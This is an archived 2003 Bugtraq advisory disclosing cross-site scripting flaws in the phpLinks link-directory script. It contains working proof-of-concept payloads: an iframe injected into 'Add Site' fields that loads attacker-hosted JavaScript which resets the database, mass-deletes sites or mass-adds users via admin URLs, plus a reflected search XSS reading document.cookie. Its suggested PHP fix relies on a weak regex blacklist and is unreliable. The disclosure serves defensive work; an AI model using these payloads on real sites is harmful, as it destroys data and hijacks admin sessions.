linux, säkerhet

88395 2003-01-21  00:11  /183 rader/ JeiAr <jeiar@kmfms.com>
Importerad: 2003-01-21  00:11  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3065>
Ärende: Multiple Vulnerabilties In PHPLinks
------------------------------------------------------------


phpLinks is an open source free PHP script. phpLinks allows you to
run a  very powerful link farm or search engine. phpLinks has
multilevel site  categorization, infinite threaded search
capabilities and  more. phpLinks is very simple to setup  There lies
a fault in the include/add.php script that allows a remote  attacker
to inject code into the script and have it run as an admin. The
vulnerability comes from improper input validation and improper
session  authentication. Below Is some example code that I have
written.

Put this in one of the field on "Add Site" form located at 
http://blah/phplinks/index.php?show=add&PID= 
If you inject the code into the Site Title or Site Url field, the code 
will be ran as soon as a logged in administrator views it.

<iframe src=http://blah/death.html></iframe>


Below is the code for the called file "death.html"

---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets 
the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i 
+ '&sure=Yes');
 }
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------


As you can see, that code (when called by a logged in admin
validating  sites) is run, the database is in alot of cases going to
be left empty. By  the way, the dbtable=links can be changed to
dbtable=temp in order to  affect sites not yet approved etc. On the
other hand you can add users to  the database and more. Take the
following code for example


<iframe src=http://blah/life.html></iframe>


Below is the code for the called file "life.html"



---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i 
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i 
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
.' + i + '&UserName=12345' + i + '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
 }
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------

Once again, when a logged in admin goes to validate sites (unless
they  have a  popup killer, JS disabled, etc.) they are gonna be
adding MANY  users to the database before they really realize what's
happening. This  also jolt's the server quit a bit by hogging up
resources. You can  basically change almost anything that the admin
can by just injecting  code. Also, note that these proof of concept
scripts could be altered to  supply large numbers of malformed site
submissions, and instead make it  something worse like popunder
windows etc. But I do not feel it would be  very good to release a
script like that publicly :) Also note that for  whatever reason the
most updated norton AV does not pick this script up as  a window
bomb. Maybe it's cause my JavaScript is so bastardized it doesn't
recognize the code at all. heheh j/k I put together a quick fix. I am
no  php guru, so if there is a better way then please correct me :)


In the includes/add.php file find the following


// Handle form submission
if(isset($submit_add)){

And right below it paste the following code

//////////////////////////////////////////////////////////////////////////
// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com //
//////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteName)) {$err.= "Please enter 
A valid Site Name.<BR>";}    
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteURL)) {$err.= "Please enter 
A valid Site URL.<BR>";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Description)) {$err.= "Enter A 
valid Description.<BR>";}    
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Category)) {$err.= "Enter A 
valid Category.<BR>";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Country)) {$err.= "Enter A valid 
Country.<BR>";}    
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $UserName)) {$err.= "Enter A 
valid UserName.<BR>";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW)) {$err.= "Please enter A 
valid Password.<BR>";}    
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW2)) {$err.= "Please enter A 
valid Password.<BR>";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Hint)) {$err.= "Please enter A 
valid Hint.<BR>";}    
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b><br>";
echo "<b>$ip</b><br>";
echo "<b>$info</b><br>";
echo "<a href=index.php?show=add>Back</a>";
exit;
}
/////////////////////////////////////////////////////////////////////////



There is also a much less serious, but similar issue with the search
feature. You can basically execute just about any JavaScript or HTML
code  and maybe more? Here is an example
http://www.blah.org/index.php?term=<script>alert(document.cookie)</script>
And if you write a script to send many automated malformed search
strings,  the code will show up with the most searched for terms on
the main search  page, thus running any code you supply on the sites
visitors browsers.  Below is a quick fix for that, I basically just
ereg the input for invalid  metacharacters.


in includes/results.php find the following

if(isset($term) && strlen($term)>0){

Below it place the following

/////////////////////////////////////////////////////////////////////////
// PHPLinks XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com 01-2003 //
/////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err.= "Please enter A 
valid Search Term.<BR>";}    
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b><br>";
echo "<b>$ip</b><br>";
echo "<b>$info</b><br>";
echo "<a href=index.php>Back</a>";
exit;
}
////////////////////////////////////////////////////////////////////////


One bad thing about the most searched for keywords feature, is that
anyone  can put their web page, name, or something obscene as a
search term. After  clicking submit xxx number of times, they now
have whatever they want on your main search page. Not really a
security issue, but could be  annoying. Don't ya think? And if
someone used some CSS they could  basically deface the site in a
really lame kinda way ..

Note that this has only been tested on the latest version of phplinks. 
Older versions may not be affected but I kinda doubt it.


JeiAr - CyberArmy Security Research ACAT Team

http://www.gulftech.org
http://www.security-research.org
(88395) /JeiAr <jeiar@kmfms.com>/---------(Ombruten)